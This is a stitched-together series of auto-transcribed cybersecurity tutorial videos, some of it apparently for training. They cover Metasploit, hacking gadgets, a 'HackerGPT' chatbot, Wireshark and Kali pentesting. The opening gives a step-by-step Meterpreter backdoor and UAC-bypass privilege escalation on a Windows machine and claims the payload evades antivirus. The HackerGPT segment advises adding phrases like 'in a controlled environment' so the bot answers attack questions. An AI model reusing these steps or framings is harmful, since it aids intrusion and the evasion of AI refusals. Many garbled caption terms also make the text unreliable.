the IP address is 192.168 72130 so we’re going to set the LHOST as 192.168.72.130 and we’re going to do the same thing with SRV host we’re going to set a port where we need to capture the backdoor access next the payload has already been set this payload will launch a backd dooror and give us interpreter access to the system metup printer is can be considered as an upgrade of a normal command prompt shell we will look into it once we get the access in the first place now that we have set the commands we can press on exploit and press enter now you can see we have a URL over here we’re going to copy this URL once the URL is copied we take it into the browser and paste it this will ask us to download this file now as per browser security settings this file should be blocked by default we can decide to keep it and with the correct formulation of this malicious package even the website browser antivirus softwares will not be able to detect good payloads we’re going to save this file and we’re going to open it publisher could not be verified if we press run and we go back to our meta beta access over here you can see it has already captured a URL of an HD server and it is writing delivering payload just have to wait for a few seconds till the payload is delivered it has sent this much amount of data meter session one is opened and we should get the access soon there we go now to understand where is the session set we can write sessions minus I as you can see it has a meta over here we’re going to write sessions minus I the session ID is one so we’re going to write one and we have the metap access now to get a fair idea of the system we’re going to write sus info and it’s going to the computer name the OS architecture all these things we can write the help command to see what are the things that we can get out of the system we can take screenshots we can control the webcam and start a video chat we can take a lot of things over here there are other commands as well where we can change the file directory like the cat command cd command there are so many things that work in the normal cmd which we can run on the meter as well now if you want to access the command prompt of the system directly we can go with this we have to write shell and there we go we are in the downloads folder right now to see if this is the same computer or not we’re going to write IP config as you can see it is our M victim machine with 192 168 or 29.171 we can just press exit and we’re back with the meter access this is how we can use Meta and Metasloit to gain access to a Windows 10 machine next let’s take a look at how we can get root access from a Windows 10 system we just learned how we can get a meter access from a system we can background this meter per session by writing background and pressing enter we can still we can still see the session session minus I it’s still present over here now these kind of access are not administrative access these are the kind of back doors that can be created for standard users but to get a complete access of a system including the program files the Windows documents we need to have root access or administrative access to do that we’re going to use another exploit reminder that the Metapita session of the standard access is already present and we’re not messing with it right now we’re going to set up another session albeit with the same machine that exploit name is use exploit Windows local bypass USC event viewer and there we go now if we check the options that we can put in the system we have to choose an exploit target we need to put a session as well let’s say we going to use the session one this is the session that has the meter access with the standard user it doesn’t have the system user we’re going to write set session one and we’re going to run exploit run a few commands and it opened a second meter session as you can see it is the session two if I write CIS info you can still see I’m not the um system user right now i’m still just a normal user how can we check that if you go to shell I’ll still see user shabb downloads all these things if I press exit go back to the meter there is a command on meter get system it attempts to elevate your privilege to that of the local system which basically means you get promoted into root access so if we write get system and due to pipe impersonation we now have the system root access as you can see now it has become x64 and we are the admin users now if I go to shell I can easily go back Windows and I can easily access these things this kind of control over the Windows folders and the program files folders these kind of things are not possible if you are not an admin access or the command prompt has not been run with admin permissions this is how we can use privilege escalation to get into an admin access system we used the second exploit which was the bypass US event viewer exploit and essentially used it with the first session as you can read here Windows escalation US protection bypass it was first disclosed on 2016 but it still works on some systems this is how we can get a root access on a Windows 10 installation hope you learned something new today today we are going to talk about some really interesting and powerful hacking gadgets you should know about in 2024 but remember this is just for learning we don’t want anyone getting into trouble so moving on the best way to keep your computers and devices safe is to know about the risk so some risk are easy to cater using strong passwords and don’t download from bad websites and don’t hand your unlocked device to strangers but they are also hidden dangers that can cause big problems some tools look innocent but can be very dangerous here are seven gadgets that look normal but are actually powerful hacking tools these tools are made for security experts to test system but they can be misused so let’s kick things off with a device that’s small but incredibly powerful that is Raspberry Pi so Raspberry Pi is a compact and affordable computer that has revolutionized the tech world originally designed for educational purposes it has become a favorite among hobist makers and even professionals despite its small size it boasts impressive capabilities including multiple USB ports HDMI output and support for various operating systems like Linux and Windows 10 IoT core the Raspberry Pi can be used for a wide range of projects from simple programming and gaming to complex IoT systems and home automation the Raspberry Pi can also be dangerous hacking tool with the right software it can be used to perform a variety of hacking task for example it can run Kali Linux a popular operating system for penetration testing this allows it to be used for network scanning password cracking and even setting up rogue access points to intercept data its small size makes it easy to hide and its affordability means it’s accessible to many in the wrong hands this innocent looking device can become a powerful tool for malicious activities now that we have seen the potential of the Raspberry Pi which by the way is one of the personal favorites for tinkering let’s move on to another seemingly simple but powerful device the Wi-Fi adapter so Wi-Fi adapter might seem like a simple device used to connect to wireless networks but it can be a potent hacking tool in the wrong hands these adapters when paired with the right software can intercept and monitor wireless communications making them invaluable for network analysis and penetration testing for example they can be used with tools like air crackg to crack Wi-Fi passwords hackers can use Wi-Fi adapters to perform attacks such as packet sniffing and man-in-the-middle attacks these activities can lead to unauthorized access to networks data theft and severe security breaches it’s like having a digital spy in your pocket while essential for legitimate security testing it’s crucial to be aware of the potential misuse and to secure your own wireless networks against such threats speaking of Wi-Fi you won’t believe how sneaky this next device is let’s take a look at a device that takes wireless hacking to a whole new level the Wi-Fi Pineapple the Wi-Fi Pineapple looks like a standard router but it is a sophisticated device used for hacking wireless networks it allows attackers to create rogue Wi-Fi access points tricking users into connecting and revealing their login credentials imagine connecting to what looks like a free public Wi-Fi only to have your data intercepted this device is capable of advanced man-in-the-middle attacks monitoring and recording data from all connected devices additionally the Wi-Fi Pineapple can capture Wi-Fi handshakes which can then be used to crack network passwords its powerful feature makes it a favorite among penetration testers for assessing network security but in the wrong hands it can be used for malicious activities highlighting the importance of robust wireless security so from Wi-Fi to Bluetooth which is everyone these days right let’s now explore a powerful tool for Bluetooth hacking the Ubertooth 1 the Ubertooth one is an open-source Bluetooth testing tool that appears to be a simple USB dongle despite its unassuming appearance it can monitor and analyze Bluetooth communications making it a valuable asset for those testing the security of Bluetooth devices think of it as a spy for Bluetooth traffic the Ubertooth 1 can capture Bluetooth packets perform Bluetooth attacks and even explore vulnerabilities in Bluetooth networks its ability to dissect Bluetooth traffic makes it a powerful tool for both legitimate security research and potential misuse understanding its capabilities helps highlight the importance of securing Bluetooth enabled devices against unauthorized access and attacks continuing with radio frequency tools which honestly sounds like something out of a spy movie so let’s discuss the hack RF1 and its versatile capabilities so the hack RF1 is a versatile softwaredefined radio SDR platform that can transmit and receive radio signals from 1 MHz to 6 GHz it looks like a standard electronic device but can be used for a wide range of hacking activities imagine being able to capture and manipulate signals across a broad spectrum with the Hack RF1 users can capture and analyze various radio signals jam frequencies and even spoof signals to manipulate communication systems this tool is particularly useful for exploring and testing the security of wireless communication systems while it serves an essential role in legitimate research and development the hack RF1 also demonstrates the need for robust security measures to protect against radio frequency based attacks so now let’s look at a tool that takes advantage of a computer’s trust in USB devices and trust me this one’s sneaky the USB rubber ducky so the USB rubber ducky is a device that looks like a regular flash drive but acts like a keyboard typing commands into any computer it’s plugged into hackers use it to execute pre-programmed scripts that can steal data install malware or take control of the target device it’s like a tiny digital ninja this tool exploits the trust computers have in USB devices making it a potent weapon for cyber attacks it’s a reminder to be cautious about plugging in unknown USB devices as they could be rubber duckies in disguise ready to unleash harmful commands and compromise your system security so finally we have got a real undercover gadget here let’s uncover the secret capabilities of the land turtle the land turtle looks like a typical USB ethernet adapter but it’s a covered hacking tool used to monitor and infiltrate networks don’t let its innocent appearance fool you it provides hackers with several capabilities such as network scanning DNS spoofing and data capture the land turtle can be discreetly plugged into a network allowing access to gather sensitive information and gain unauthorized access its ability to operate undetected makes it particularly dangerous emphasizing the need for vigilance and robust network security measures to prevent unauthorized devices from connecting to your systems so there you have it guys we have explored some of the most powerful and dangerous hacking gadgets out there these tools can do a lot of damage if they fall into the wrong hands that’s why it’s so important to stay informed and vigilant about cyber security hey everyone today we will explore the world of cyber security with hacker GPD specialized version of chat GPD designed for ethical hacking and cyber security in a digital landscape where cyber attacks occur every 39 seconds causing billions in damages annually hacker GPT provides the essential tools and knowledge to defend against these threats so hacker GBD offers guidance on a wide range of topics including security practices ethical hacking techniques and scripting for system security cyber crime damages are expected to reach $6 trillion annually making it a major challenge for organizations and if we talk about some of the breaches so in 2020 over 36 billion records were exposed due to data breaches and the infamous Equifax breach of 2017 where 147 million people’s information was compromised highlights the importance of regular security assessments and vulnerability management these are the areas where hacker GBD excels and hacker GBD strictly adheres to ethical guidelines refusing to assist with any unethical or illegal queries so our commitment is to provide guidance that adheres to legal and professional standards helping you become a responsible cyber security professional so guys let’s get started with hacker GVD that equip you with the knowledge and skills to defend against cyber threats ethically and effectively craving a career upgrade subscribe like and comment below dive into the link in the description to fasttrack your ambitions whether you’re making a switch or aiming higher SimplyLearn has your back and just a quick info for you guys if you are an aspiring cyber security professional looking for online training and certification from prestigious universities and in collaboration with leading experts to enhance your credibility then search no more simply learns postgraduate program in cyber security from MIT University in collaboration with EC council should be your right choice for more details you can use the link in the description box and pin comment so let’s get started so guys this is chat GPT and this is the paid version of chat GPT for what I was telling you is this is the explore GP section so here you can find all the GPS that are created by chat GPT OpenAI or the individuals or you can find the companies who have created GPS so you can find these are the recently used and this is the most used hacker GPT you can find other GPs also that is hacker GPT and you could see that and they have been used by 5,000 plus users and this have been used by 10,000 plus users so you can just search for ethical hacker GBT here and it has been rated 4.5 stars 10,000 plus conversations and these are the conversation status if you need any assistance and the capabilities you can see here and the ratings given by users and more by the creator who has created this so we’ll start with this we’ll start the chat here and I want to tell you guys that chat jeopardy doesn’t answer non-ethical questions so if you try to extract that information from chat GP that won’t be possible but we can do a bit like we can cross a bit line with ethical hacker GPT but that should be used for ethical purposes only so I will show you guys how you can utilize this GPT and one more thing guys if you want to create your own GPT you can also create that also you can go to explore GBD section and here’s the create option click on create and here you can start creating your GBD if you click on configure you can write the name of your GBD description instructions and the conversation starters as you just saw with the hacker GBD ethical hacker GBD and the capabilities what you want to be enabled you can do that and here in the create section you could write the prompts here and it will take that information and use it for more purposes and here you could attach more files that could help create your GPD okay guys so here you could see the configuration and the preview of your GPT and you can finalize that so moving back we’ll get back to ethical hacker GBT and start with our conversation with him so starting with the first thing we can do is we can ask him like how can I perform a basic security assessment on a web application so if I tell you guys performing a basic security assessment on a web application is crucial for identifying vulnerabilities and ensuring the application is secure and this process involves using various tools and techniques to test the application for common security issues so you could ask him that how can I perform a basic security assessment on a web application and just wait for a few seconds and you could have the response from ethical hacker GV so you could see that performing a basic security assessment on a web application involves several key steps and these are the key steps number one is preparation and information gathering and how you can do that these are the steps identify the scope gather information then is the second step that is reconnaissance and you can use the tools burp suit nikto and others similarly you could see all the steps here so I won’t be guiding or I won’t be reading what responses are generated by ethical hacker GBT i have used that and he provides very accurate like I would say around 95 to 96% accurate results here I want to show you guys how you can utilize it so I will show you prompts and what things you can ask him so this was all about repeat so this was about the general security thing now we’ll move to ethical hacking and we can ask him how we can perform a SQL injection attack ethically on a test environment so these are the prompts that you can write that would be how do I perform a SQL injection attack and that to ethically if you write this that would be good on a test environment and if I tell you guys so SQL injection is one of the most common web application vulnerabilities and understanding how to perform a SQL injection attack ethically on a test environment can help you identify and mitigate this risk in your own applications and you could see he has responded and he has provided you the steps that you can set up a control test environment first thing then preparation and you could use these tools then you have the manual SQL injection testing so these are the methods that you could use that is or or 1 equal to 1 for the database and automated SQL injection testing So this is the command for that and you could verify vulnerability documentation reporting so you could see that this GP is capable of answering the basic questions as we have discussed the basics question till now now we’ll move to scripting and automation so here you could see how he respond to this so we’ll ask him can you provide a Python script to scan open ports on a network so let’s see what he provides provide a Python script and that to to scan ports on a network so scanning open ports on network is a fundamental step in identifying potential vulnerabilities and a Python script that can automate this process making it easier to regularly check for open ports and secure them so this is the Python script you can use any ID and run on that and you could see that he’s explaining the code also yeah you can ask him like can you explain the code line by line and this hacker GBT will do that for you and how to run the script that also he has provided you and similarly we can also ask him that how we can write a bash script to monitor and log unauthorized login attempts and if you want I can also run this prompt how do I write a bash script and that to to monitor and log unauthorized access unauthorized login attempts so we can monitor and log unauthorized login attempts and that would be essential for maintaining the security of your system so as you can see he has written a bash script and that can help you automate this process and this will provide realtime alerts and logs for further analysis and you could see that he’s providing the explanation and how you can run the script and he’s writing the note also like you can write more prompts if you have any doubts in any of the script or any of the responses that hacker GPT has responded and he will definitely provide you with good responses so now moving on now we’ll ask this ethical hacker GPD about some specific security tools and we could ask him about Burp suit and so let’s write a prompt can you explain how to configure and use Burp suit or we can write for web application testing so if I sum you up so Burp suit is a powerful tool for web application security testing and understanding how to configure and use it effectively can help you identify and address a wide range of security vulnerabilities in your applications so you could see he has provided the initial steps that would be downloading and installing Burpsuit configuring your browser to use Burpsuit as a proxy and then intercept and inspect traffic and then you can use it for testing purpose logging and reporting and tips for effective testing so this is the response for the security tools and if we talk about incident response we can ask him to write a script to collect system logs for forensic analysis so collecting system logs is a critical part of incident response and forensic analysis and this script can automate processes that can ensure that you have all the necessary data to investigate security incidents effectively so if I write here we can ask this hacker GPD and I’m sure he will provide the response for that and write the script so can you provide a script to collect system logs for forensic analysis so as I told you this is the critical part of incident response and we have covered about the tools that is BBS suit we have asked him about the automation process general cyber security question ethical hacking that would be SQL injection attack and the Python script to scan open ports on a network so he can write scripts also automation task and he could response with the general cyber security questions also and if you see here for the incident response he has writed the script to collect system logs for forensic analysis so I won’t be explaining this code as we’re just looking for the prompts that we can give to ethical hacker GBT if you want you could just ask him also that explain this code line by line and here he has mentioned also the explanation that is directories and files to collect and after that he’s collecting the logs and that will be copied in the directory that is he has mentioned it a variable that is output directory archiving logs cleanup and how to run the script so this was about the incident response now we move to some advanced topics and in advanced topics what we can ask him is key how to perform a man-in-the-middle attack in a controlled environment and remember these that you have to mention some of the keywords that would be in a controlled environment and for that thing only he will response or provide the response to you so I will start here that how do I perform a man in the middle attack in a controlled environment so if you understand man in the middle attack that works in a controlled environment this can help you develop better defenses against such attacks and it’s important to learn and practice these techniques ethically so you can see here that he’s providing the prerequisites and the step-by-step guide how you can conduct a man-in-the-middle attack so first is set up the control environment then install necessary tools enable IP forwarding perform ARP spoofing and then capture and analyze traffic clean up and restore the network and conclusion so you could just follow up with more prompts that I want more information about setting up the control environment just write this prompt and this ethical hacker GPT will provide more responses to you so he will provide you how you can set up the control environment so now moving on we will ask some more prompts and that could be about the reverse engineering so we could ask him that can you explain the processes of reverse engineering a malware sample or we can also ask about honeyport to detect malicious activity that could be how can I implement a honey port to detect malicious activity or what are the techniques for securing a docker container so we’ll ask him one prompt here so let’s see what he responds to that so how can I implement a honey report to detect malicious activity so you could see that he has started responding to that and if I tell you the sum so a honey port is a security mechanism set to detect deflect or in mechanism to some manner and it counteract attempts at unauthorized use of information systems implementing a honey port can help you monitor and understand attack patterns and this is the step-by-step guide to implement a honeyport you can choose the type of honey port prepare your environment install and configure the honeyport software and these are all the commands how you can configure it then you can monitor and analyze the honey port and regular maintenance and updates and this is the simple port using honey you could install that and run these commands so with that guys and in the last we will also cover cyber security policies and compliance so he could also answer to those prompts also that you can ask him that what should be included in a company’s cyber security policy and you could mention which type of company you are running so I will ask him that so you could ask him that what should be included in a uh attempt cyber security policy so let’s see so you could see here that creating comprehensive security policy for an act company involves adding various aspects and that would be introduction first is the purpose for cyber security policy scope roles and responsibilities data protection and privacy network security application security user security awareness and training incident response and management compliance and legal requirements physical security device and endpoint security so similarly you could ask him that draft me the company’s cyber security policy and start with the introduction so he will provide you all the introduction points and then you can ask him that draft roles and responsibilities he will draft that also so you could like break it into parts and ask the ethical hacker GPT and he will respond to you as it has some limitations of some words and some of the responses so you could ask him in the breaking parts and he will respond to you do you know friends that Wireshark is a powerful network protocol analyzer that helps you capture and analyze network traffic in real time it allows you to deep dive into data packets traveling through your network giving you insights into network performance security and troubleshooting in this tutorial we’ll guide you through the basics of using Bioshark from setting up your capture environment to interpreting the data by the end of this tutorial you’ll have a solid understanding of how to navigate Yshark interface set of filters and analyze the network traffic for different use cases so guys let’s get started so guys let us start first by understanding what is Wireshark so guys Vireshark is a comprehensive open-source network protocol analyzer that basically allows user to capture and analyze the data traveling over the network in real time it is widely used by network administrators security professionals and also developers for various purposes for example guys like network troubleshooting where you have to identify and resolve network issues by examining the traffic patterns and diagnosing the connectivity problems the next one is network analysis which we’ll also be doing in our hands-on where you have to understand and optimize network performance by analyzing data flows and interaction between network systems the third one is security auditing you will also have to detect and investigate unusual or potentially malicious network activities such as unauthorized access or data breaches and finally you have a protocol development where you can debug and develop network protocols by capturing and analyzing protocol messages and behaviors the key features of Wireshark are the first one is packet capture wireshark captures packets of data transmitted over the network each packet contains a wealth of information including source and destination addresses and also you get protocol types and payload data so as you can see all over here I’ve already downloaded via shark and I’ll guide you also how to download it but as you can see these are the lines that shows that the Wi-Fi packet you know graph is showing that this is how the packets are transmitting so this is basically the realtime analysis what you can get through in wireshark next one is you get a detailed inspection guys wireshark also decodes and displays data at various protocol layers example you can get Ethernet IP TCP HTTP which allows for detailed examinations of network communications you can also perform filtering and searching then you’ll also get a chance to do data visualization which includes features for visualizing network graphics such as flow graphs as you can see all over here and also statistics which can helps in understanding network behavior and performance wireshark is available for multi-operating systems like for Windows Mac OS Linux and many more now there are certain scenarios where network security engineers use it suppose for network performance monitoring where you track and analyze the performance of network applications and services you also get an incident response you investigate and respond to network security incidents by analyzing capture traffic and you also do the protocol analysis where you examine and troubleshoot network protocols and ensure proper implementation now let us start with the wireshark so first let us download the wireshark and before we download it I expect that you would have got some brief idea regarding what is wireshark now what you have to do guys you have to go at this link wireshark oorgg.d download.html so since I’m using windows so I have clicked on windows x64 installer just right click on this so as you can see it will start downloading so guys since I’ve already downloaded it I may not have to do it again and the steps are very simple just you have to click yes yes and it’s going to download all the required dependencies and your installer will be ready and after clicking all the okays you are going to get something like this so this is your entry of the wireshark network analyzer now so as you can see all over here you can capture the network packets from these interfaces so you can see local area connection 10 adapter lookup traffic capture Bluetooth is there then you have the Ethernets okay so let us choose the Wi-Fi as a network interface okay and just click on this so as you can see all over here so many of the packets have started running up okay and this is a shark icon so basically it is uh doing the real time packet capturing where you have all these things so now let us try to understand what is there in wireshark so you can see you have file basically for managing files you have open save export okay so these kind of options are there you can also export the TLS session keys okay you can export the objects and uh you can do print quit then here in the edit so edit you can modify the preferences settings and profiles if you talk about view you can adjust the layout all over here or wireshark if you talk about go you can navigate through the packets all over here then here is a capture you can start or stop all over here you can restart it then next is analyze so as you can see all over here you have display filters display filter macros display filter expressions and many more okay similarly you have statistics okay which helps in viewing network statistics and data summaries here you have telephoneony for using these kind of protocols okay then you have wireless okay then you have tools all over here firewall ACL rules MAC address okay and there you have the help icon so this is a very basic outview of this application now let us do some basic exercises first so let us try to capture a traffic first okay so since I’ve already selected uh our network interface as Wi-Fi and let us restart it so you can just go on capture and just start the restart okay so this has started now go to your browser and just type say http okay and say bin og is a file so guys this is a basic website that we have requested on our browser and let us go to our wireshark and stop this for a moment so as you can see all over here this icon shows applying a display filter now go all over here and type the filter say http okay and you can say our filtering would be done so as you can see here you have the source you have the destination here you have the time here you have the number here you have the length of the packets okay and this is the info okay so now let us do the general analysis of the wireshark output so as you can see all over here the first one is HTTP request and responses so as you can see this is our source okay we are sending a request to the destination address with [Music] 44.219.81.240 the protocol is HTTP and the length of the packet is 480 and it is basically a get request okay so get HTTP/1.1 now there’s a reply from this destination all over here and to the destination at our source the protocol is still HTTP now the length of the packet is increased is 887 and what we are getting guys all over here that the status is 200 and it says okay now as you can see what we are getting basically an HTML file all over here okay now similarly we are again requesting and we are getting a JSON file all over here now getting a specific JSON HTTP 1.1 and similarly reply is coming so as you can see it’s a two and fro motion where we are requesting to a destination which is the browser with the protocol HTTP and similarly we are getting a reply from our destination so guys this is our device and this is the given uh resource we are trying to access on our browser so basically now we can see these are the content types which is text HTML for the HTML structure okay and also you can see all over here this is a JSON type okay and uh these are the type of the content we are trying to access it okay and this is the uh request what we have uh done to our uh destination which is the browser okay with the bin og and it is returning a text html file i hope so guys you would have got a brief idea like how you can do the general analysis of the wireshark output now let us try to do one more example which will make our concepts more clear now guys I will show you one more use case of this that you can diagnose the network issues with ping and trace command okay so with the help of wireshark this can also be done guys so what you need next is you can open a terminal okay and just right click all over here and now in this what we are going to do guys we are going to generate an ICMP traffic so with the help of ping command okay so now what we do we type ping say google.com and you can see all over here the request and reply have started and now what we will do guys we will use the tracer command for tracing our packet flow so so you can see something we have got all over here we will discuss about this bit later now let us open our wireshark okay and what we’ll do guys we will type ICMP okay and just click all over here okay so guys go to the filter and type ICMP okay and just click all over here and but before that you have to stop this and now let us try so you can see all over here that here the destination is showing unreachable but here we are getting the reply okay now let us try to examine this protocol okay so what all over here let us try to understand first what we did in the terminal okay so guys when we are typing the command ping google.com this command is basically testing the reachability of google.com by sending the internet control message protocol or ICMP echore request packets and waiting for the replies which is echo response now guys let us break down the ping results so first three replies we are going to see that each reply shows the IP address of 142.250.1 2550.1 93.110 which is one of the Google servers and you can see the roundtrip time latency for the packets for the first time it is showing around 76 milliseconds for second round trip time it is showing around 88 then third is 99 and fourth one is 30 mconds now you can see uh there is something called time to live also and in this case the time to live for each packet is around 55 millconds Okay so basically this field indicates how many hops or routers the packet can pass through before being discarded okay now you can also see the request timeout so the fourth packet is a request timeout meaning no reply was received within this set time and you can also see the ping statistics so you can say here sent four packets received four packets and there is no loss okay so this is one thing and also approximate round trip in milliseconds you can see minimum is 30 milliseconds and maximum is 99 millconds average is calculated 73 milliseconds so this is statistics what we got now you can see all over here we have the trace command okay so here no arguments are provided first so let us try to understand the d means do not resolve IP address to host names okay where h means maximum number of hops of routers to search and w means timeout in milliseconds for each reply so suppose if I see tracer google.com so guys this will show all the hops that the packet has to travel through reach the Google server which will help to diagnose where the delays or issues might occur on the path now you can see all over here there are lot of options are given so similarly you can read this now let us try to do the wireshark analysis so you can see all over here with our source 10.101.5.118 and we are sending the request to the Google server and this is internet control message protocol so you can see all over here this is eco this is a ping request with ID 0x001 and we can see the sequence is also given the time to live and we are replying in 7641 millconds so this packet is basically what we are doing guys we are 7630 is our packet number and this is what we are sending as a request then 7641 is a reply from the Google server with the given ID okay the sequence number of this and the time to live and it is also giving the request one now what you can do guys you can also apply one filter all over here we can okay now with the help of this you can just see there are a lot of options as a filtering okay so you can read the documentation for this and whenever it is turning red guys it is showing something as error okay and now uh let us do this and let us type our IP address say 101 1 okay 1 dot 5.118 okay so this is also one of the way you can apply the filter okay so it’s going to filter out the IP address okay say let’s do this so it is going to filter out our IP address which is basically the same which is sending because we have not given any other ping requests so guys here what we can see so this is kind of of the analysis what we are doing basically okay so guys this was a wireshark analysis for diagnosing the network issues with the help of ping and trace commands and you can do lot more other things with the help of wireshark basically these tools are used by network administrators hackers and also network engineers to understand the network performance diagnose the network issues okay so this was a short exercise which I have shown you about the basics of wireshark i hope so you would have enjoyed our today’s video imagine being able to assess a security of a systems like a pro hacker but ethically of course in this tutorial we are going to walk you down through how to perform penetration testing using Kali Linux which is one of the most powerful tools in the cyber security world whether you are a beginner or a tech enthusiast you’re going to learn the basics of pentesting with essential tools in Kali Linux and how to identify vulnerabilities in your network by the end of this video you’re going to have a strong foundation on how to start your ethical hacking journey so first let us try to understand what exactly is penetration testing penetration testing or pen testing is a simulated cyber attack which is conducted by ethical hackers to evaluate the security of a system application or even a network the goal here is to uncover vulnerabilities weak points that attackers could exploit and provide actionable recommendations to secure the systems unlike regular vulnerability assessments penetration testing goes a step bit further by actively exploiting the vulnerabilities to understand their impact now you would be wondering why do we do penetration testing so penetration testing serves several critical purposes first of all like identifying the weaknesses so you could just write over here okay now let us discuss about this point so even the most secure systems have vulnerabilities and these can stem from outdated software misconfiguration or even a human error now penetration testing uncovers these weaknesses before they are exploited suppose I’ll give you an example uh you have a web application that uses an outdated version of a PHP a penetration test could reveal that this version has known vulnerability allowing remote code execution okay so for this purpose you could use penetration testing the second point is testing incident response a penetration test doesn’t just highlight vulnerabilities but it also assesses how your systems and team respond to simulated attacks this helps their organizations identify gaps in their incident response plans suppose during a test a ethical hacker deploys ransomware the security team speeds and efficiency in detecting the containing the attack determine their readiness for the real incident so for the incident response testing you could use penetration testing now the third point could be meeting the compliance standards industries like healthcare finance and e-commerce must comply with stringent data protection regulations so penetration testing helps meet standards such as PCIDSS GDPR or HIPPA okay so I’ll just mention all over here fine now the fourth reason which I could think of could be protecting the reputation a breach can damage customers trust and tarnish your brand image penetration testing is a proactive way to safeguard your reputation for example a major retail chain suffers a data breach exposing millions of customer records post incident analysis reveals that a simple penetration test could have identified the vulnerability and prevented the breach now let us discuss about types of penetration testing so penetration tests can be categorized based on their scope and the level of information shared with the tester on the basis of that I have mentioned three of the penetration testing types the first one is blackbox testing so here the tester has no prior knowledge of the system this simulates an attack by an external hacker so that is called a blackbox testing now if I discuss about white box testing here the tester has full access to the system including source code architecture details etc so this simulates an insider attack or a highly informed hacker the third one that we have all over here is gray box testing so here the tester has partial knowledge such as user credential or limited architecture details based on this he simulates the attack so you could do these kind of penetration testing on a system to check its vulnerability now let’s do a hands-on exercise on penetration testing with Kali Linux now if you have not installed Kali Linux so just go to the official documentation or official website of Kali Linux so here you could see you’ll get a tab called get Kali okay just uh you could go for virtual machine way of installation uh you could go through installing the image okay so there are various ways you could do it but if you’re using Windows operating system so what you could do just go directly to your Microsoft Edge okay so here it is going to have Kali Linux just type on okay so you could see this app is there and you could install this directly so you could see I have installed it directly so let us open the terminal okay and the process of installation is very very simple now on Kali Linux you have to install some additional tools to perform penetration testing so now let us try to set up the tools okay so you can see all over here I have opened my Kal Linux terminal now the tools that we are going to install all over here will be N mapap ho dig nectto WP scan open bus and metasloit let me give you a brief idea about these tools so N map also stands for network mapper so the purpose of this tool is going to be scanning the network to identify open ports services and operating system you could also scan the target for open ports and also the running services next tool will be who is now who is is going to provide you domain registration details and ownership information like for example who is and you could give a name like certain uh example.com could be a you know demo website so which will help you to gather domain level information about the target now the third tool is dig so Dick performs the DNS enumeration to receive the DNS records like for example A MX NS okay so all of these are DNS records basically so this tool is very much important if you are you know uh you know we will be needing some DNS record to do the penetration testing so basically it is used to explore the DNS structure of the targeted domain now the fourth tool is going to be Nikto so Nikto is going to scan web servers for vulnerabilities such as outdated software default configuration and potential misconfigurations now it is also going to check for vulnerabilities on the web server also the fifth tool is WP scan now if I talk about this so this basically scans the WordPress websites for vulnerabilities in themes plugins and core files okay now it enumerates the users and checks for plug-in vulnerabilities so WP scan requires an API token which can be obtained from this website so type wpu lndb.com so you could uh get it all from here okay so this is certain additional requirement now let us talk about the next tool that we have is openvas now if I talk about openvas or greenbone vulnerability manager so this provides a comprehensive vulnerability management system okay so basically it performs scans to detect vulnerabilities across the target finally we have the metas-ploit if I talk about metas-ploit then it is basically used to exploit development and execution for identified vulnerabilities now before updating it you have to type certain thing like this sudoapp update okay so after you have done this then you could just type sudo apt install n mapap now since I’ve already installed n mapap okay so I don’t need to do it but you could do it with this command so now let us check the version of n mapap for that purpose you could type n mapap and type version so you could see I have 7.94 version okay and this is official documentation of n mapap if you want more information about this tool you could refer this documentation the next tool is who is same thing we have to do pseudoapp update okay now next thing would be suda app install who is okay so we have installed who is also next tool will be dig so just install dig like this so you could install dig something like this so app install DNS utils okay so we have installed dig also and to check the version type dig vi so you would get the version as 9.2 okay finally let us install nectto so same command for here type necto since I’ve already installed necto so I don’t need to do it now let us check the version of it necto so you could see I have version of nikto all over here now fifth tool will be WP scan so same thing so you could see it has installed WP scan also now after installing register at uh you know WP scan and copied the generated you know API token so guys as you can see all over here on your WP scan/profile you’re going to get an API token now guys let’s move ahead so guys you can check the version of WP scan after you know typing wpcan/ version and you could see I have version 3.8.27 installed now let us install openvos so for installing openvos type sudo app install and then type openvas so you can see all over here that our installation is in progress and it is installing this tool so guys you can see all over here we have installed this tool so so guys next step is installing metasloit so type sudo app install metasloit framework now since I’ve already installed this so I need not need to do it but you can type this command and you could download it okay so there is one error in this okay now it’s fine now let us check the

version of it so type MSF console and next would be version so you can see I have 6.4.34 version now we have installed all these tools and check the version also now let us proceed for penetration testing okay guys so we’ll be using this uh demo website to do the pent penetration testing so you could get the link all over here so it is a juicehop.herokuapp.com okay I will mention it in the link so you could access this website to learn how to do penetration testing but one word of advice before you are doing uh penetration testing for any other application uh just get a written permission of it without uh their permission you cannot do the penetration testing of any official website so because the idea is uh hacking ethically okay so unethical practices is not permissible now let us open our Kal Linux okay so here we are going to open the end map and we are going to run a scan on this website the same website which we have opened which is httpjushop.hoku.com heroku.com so just copy the link okay so type nm mapap ss a and give the name of the given website and so you could see now it has started scanning so basically this is going to reveal the open ports services and possibly underlying technology of the web application so guys it might take some time just wait for a few moments so guys you could see all over here that N map has given the complete scan okay so you could see the stats all over here so port 80 and it is using a TCP protocol okay and state is open it is uh so port 80 is basically open all over here and the service is HTTP okay and the version is cowboy so we have got this brief idea regarding this that uh for open port on HTTP it is 80 now let us identify the web server use all over here so you could see all over here the server is Heroku router and uh so we have got all the information of this website we have got the open port so the overall idea was to look for the open vote okay now let us do the vulnerability assessment of this so for doing the vulnerability assessment we’ll be using necto so type nicto /h and the name copy the link now in this we are going to look for misconfiguration or outdated server version or exposed directory and files so you could see we have got uh the target host name the target port okay and uh you could see the SSL info is also given all over here okay and uh so you could see all over here it is telling that the site uses TLS and the strict transport security header is not defined all over here so in similar way still uh is looking for the vulnerability okay let us uh give it some time so guys you could see all over here that Nikto has given a lot of vulnerability assessment so let us try to look at first okay now you could see it has also told that server is using wild card certificate okay if you want a brief idea about it just click on this link then uh you could also see all over here that uh it is giving all the information what could be you know vulnerable so now it is giving some backup certificate file found so if you move down a little bit so you could also see that Xc content type header is also not set so here it is telling that it could allow a user agent to render the content of the site in different fashion so this can be a mime type attack can be done on this website so guys you can see all over here that it is also given robots.txt so this is actually a plain text file which is located in the root directory of the website for example juice entry.com/roots.txt the primary purpose is to instruct web crawlers such as search engine bots or like who are interacting with the website it can release sensitive information making it significant for both web security and SEO perspective so guys you could see all over here we could manually check for robots.txt file so give the link of the given website for which you’re doing the pen testing and give / robots.txt now you could see in the output it’s given user agent star disallow FTP now what is user agent so this is a directive which applies to all the web crawlers and the bots so asterisk is a wild card meaning it is intended for every bot that visits this website example it could be a Google bot or bingeb etc now what is it is disallowing so disallowing it is this directory is telling that bots not to crawl on the index of the FTP directory of the website okay so bots should keep uh you know they should skip this FTP and avoid listing its content in the search engine however this does not restrict manual access by the users or attackers like who can directly visit the / FTP URL in their browser or they could use a tool like curl so what is the significance of these configuration like for example with the web 